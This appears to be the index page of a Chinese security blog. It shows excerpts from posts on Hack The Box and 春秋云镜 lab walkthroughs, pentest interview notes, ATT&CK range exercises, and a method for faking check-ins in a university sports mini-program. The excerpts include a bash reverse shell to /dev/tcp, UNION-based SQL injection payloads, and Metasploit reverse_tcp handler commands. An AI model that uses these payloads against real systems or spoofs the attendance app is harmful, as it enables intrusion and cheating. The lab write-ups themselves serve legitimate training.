觅幂小程序打卡
齐鲁工业大学 觅幂小程序打卡github 地址 可以去github看一眼
https://github.com/wanan0red/qlu_mimi_sport
操作有点复杂 不过一次操作 一直方便 系统不重启可以用两年 当然用模拟器也是可以的
用到的软件我都传到了 百度网盘 如果不放心软件 可以自行下载安装 其中的poc.exe 中有 .py源码 可以以源码形式运行
还不会的可以联系我(有想学网安的也可以哦) 1498032121@qq.com
链接:https://pan.baidu.com/s/1a6aiF2rYJSjt5HJddqboeA?pwd=6rjx 提取码:6rjx
首先我们需要先下载一个电脑版的微信
我们首先需要安装 burpsuite
https://portswigger.net/burp/releases 可以去官网下载
一定要选择社区版
双击安装 一直下一步就行了
没有给我们创建快捷方式 我们 ...
面试题目
获取目标站点的绝对路径
如果是iis系统,尝试对参数进行恶意传值,使其出现报错页面
对目标网站进行js代码审计,查看是否存在信息泄露出站点的绝对路径
使用字典猜解目标站点的绝对路径
如果目标是thinkphp框架,尝试访问无效的路径,或者对参数进行而已传值使其报错
phpinfo页面泄露站点的绝对路径
怎样进行信息收集
获取目标的真实ip,如果有cdn就绕一下
通过真实去进行半开放的端口扫描,获取目标服务
通过审计js代码 + jsfinder工具查看是否存在接口泄露可以使我们进一步的利用
对站点进行指纹识别,查看cms历史漏洞
通过乌云查找目标的历史漏洞,查看脆弱点
通过google黑语法搜索目标站点的敏感关键词 如 登录 后台 学号 上传
通过目录扫描工具扫描目标站点文件,查看是否存在未授权访问文件或者更多的功能点
通过潮汐 在线子域名 layer子域名挖掘机进行子域名收集
通过nmap goby对c端进行信息收集
绕cdn
通过境外ip去平目标系统
主动向我方的请求,如发邮件
获取多个子域名ip对比
查看dns记录
通过网络搜索引擎去搜索
只有一个登录页面如何去测测试逻辑漏 ...
hack the box 代理加速
hack the box代理加速
最近在打 htb的时候网络非常的卡顿 并且在kali中反弹shell 与主机中使用burpsuite 会引起冲突 这里提供一种方案来获取两个ip
首先我们先下载 udp 的配置文件
这里接着查看下clash 的代理端口 以及开启允许局域网连接
注意代理的地址 最好和vpn 服务器一
由于udp 的配置文件 因此我们添加socks 协议的代理
socks-proxy 127.0.0.1 7890
接着我们下载 tcp的配置文件
同样添加代理
不过需要注意的是这里需要添加 与kali同网段的
http-proxy 192.168.1.1 7890
这样我们就能同时在两台机子上都有 ip 了
htb(二)
Oopsie
proxy
发现不是
这里可以看到 有个login
尝试发现是
/cdn-cgi/login
发现需要admin
Cookie
将id修改为1
34322
记得之前扫到的 /uploads目录
db.php
/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.217/5555 0<&1'
反弹到的shell需要把他转换成一个交互式的shell才能切换用户 设置shell为/bin/bash script命令可以用作交互终端会话过程记录,保存用户输入和系统输入的全过程 -q是静默执行 把会话内容丢到黑洞/dev/null
SHELL=/bin/bash script -q /dev/null
f2c74ee8db7983851ab2a96a44eb7981
这里可以看到文件属于root 在bugtracker因此 使用rebert执行的话就是root权限
查找属于这个组的
find
看一 ...
春秋云镜(一)
CVE-2022-32991这里找一下源码审一下
根据漏洞编号搜到 源码名字
<@urlencode>-60377db362694'<@/urlencode>
60377db362694' or '1
60377db362694' order by 5 -- 60377db362694' order by 6 --
60377db362694' union select 1,2,3,4,5 --
60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 --
60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='fl ...
春秋云镜(二)
CVE-2022-25411
这个模板有bug 需要添加 index.php才能访问 但是静态文件中又没加
密码 admin admin888
CVE-2022-25401
安装完成访问不了可以删除 installation文件夹
框架洞挺多的
alert这里三个文件包含
这里存在一个任意sql语句执行
这里跟进api()看一下
这里可以看到自定义了一个 key请求头 并且通过 sanitizeString() 方法的过滤执行了sql语句
跟进去发现并没有预防sql注入
添加请求头尝试一下
可以看到sql语句
这里可以很明显发现是一个布尔盲注
那么怎么扩大危害呢
那么我们尝试使api返回true然后执行任意sql语句
可以看到这里是0 那么我们现在可以让他返回1
类似的思路在 api/index.php 中还存在一个任意代码执行
同样的逻辑
这里的关键在于如何构造函数
简单看一下就知道是将function作为执行函数 将其余post参数的值作为执行参数
还有其他洞可以去 github查看
但是这里远程无法实现 猜测是 ...
htb(一)
Meow
Virtual Machine
Terminal
openvpn
tun
ping
nmap
telnet
root
Fawn
File Transfer Protocol
21
sftp
ping
nmap 10.129.119.29 -p 21 -sV
vsftpd 3.0.3
unix
ftp -H
anonymous
230
ls
get
Dancing
server message block
445
nmap 10.129.44.223 -p 445
-L
4
workshares
get
Redeemer
nmap -sS 10.129.100.239 --top-ports 5000
6379
redis
In-memory Database
redis-cli
-h
info
5.0.7
select
4
keys *
Appointment
Structured Quer ...
无题
暴雪账号代注册【闲鱼】https://m.tb.cn/h.UnRggEi?tk=czaBdS9gTIk CZ0001 「我在闲鱼发布了【暴雪战网账号 守望先锋2 非个人原因被封钱全退 全新白号】」点击链接直接打开
https://m.tb.cn/h.UnRggEi?tk=czaBdS9gTIk
下载暴雪客户端https://share.weiyun.com/Epgv4w54
解压到一个合适的位置
创建一个快捷方式
拖动到桌面
输入邮箱密码即可
这里可以选择地区
绑定安全令首先下载战网安全令安装
https://d-14.winudf.com/b/APK/Y29tLmJsaXp6YXJkLmJtYV8yMDYwMDAxNV9lMzU0ZTcx?_fn=QmF0dGxlLm5ldCBBdXRoZW50aWNhdG9yXzIuNi4wLjE1X0Fwa3B1cmUuYXBr&_p=Y29tLmJsaXp6YXJkLmJtYQ%3D%3D&download_id=1342408286573170&is_hot=true&k=643e38950 ...
ATT&CK(四)
ATT&CK(四)
win7douser Dotest123webubuntu ubuntuDCadministrator Test2008
docker ps -adocker start ec814f6ee002docker start 174745108fcbdocker start 09dd4e5bfa91
探测服务先探测下ip
nmap 192.168.157.0/24
struts2发现是struts2 程序 直接扫
传个冰蝎马
弹给msf
use exploit/multi/handlerset payload java/meterpreter/reverse_tcpset lhost 0.0.0.0run
172 开头的
推测是docker的
判断docker方法
查看是否存在dockerrnv文件
ls -a /.dockerenv
查看系统进程的cgroup信息
cat /proc/self/cgroup
tomcat
searchsploit tomcat 8.5.19
searchsp ...
ATT&CK(六)
ATT&CK(六)
V3.2web\de1ay | 1qaz!QAZ1qaz!QAZde1ay\de2ay | 1qaz@WSX!QAZ2wsxde1ay\Administrator | 1qaz@WSX
搭建typecho
然后启动就好了 之后用
de1ay\Administrator | 1qaz@WSX
登录
更改端口为2000
发现数据库有问题
这里进去之后发现没有这个 typecho 数据库
重新安装一下吧
下载 typecho
https://github.com/typecho/typecho/releases/download/v1.1-15.5.12-beta/typecho.tar.gz
先将 typecho下的文件全部删除 接着将 build下的文件全部复制进去
添加typecho数据库
审计typecho接着我们审计一下typecho
反序列化点在install.php 那么我们需要先到达反序列化点
这里的第一个if 只需要添加上 finish参数即可绕过
第二个if需要添加一个本站的 referer
这里 ...